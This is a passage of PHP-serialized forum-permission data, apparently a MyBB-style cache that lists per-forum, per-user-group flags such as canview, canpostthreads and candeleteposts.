67\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"782\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:81;a:12:{i:1;a:18:{s:3:\"pid\";s:3:\"708\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"709\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:9;a:18:{s:3:\"pid\";s:3:\"713\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"710\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:6;a:18:{s:3:\"pid\";s:3:\"711\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:1:\"6\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"712\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"714\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"715\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"716\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"717\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"718\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"784\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:82;a:12:{i:1;a:18:{s:3:\"pid\";s:3:\"788\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"789\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:9;a:18:{s:3:\"pid\";s:3:\"793\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:5;a:18:{s:3:\"pid\";s:3:\"790\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:6;a:18:{s:3:\"pid\";s:3:\"791\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:1:\"6\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"792\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"794\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"795\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"796\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"797\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"798\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"799\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:75;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"814\";s:3:\"fid\";s:2:\"75\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:34;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"812\";s:3:\"fid\";s:2:\"34\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:44;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"454\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"455\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"456\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"457\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"458\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"459\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"460\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"461\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"462\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"can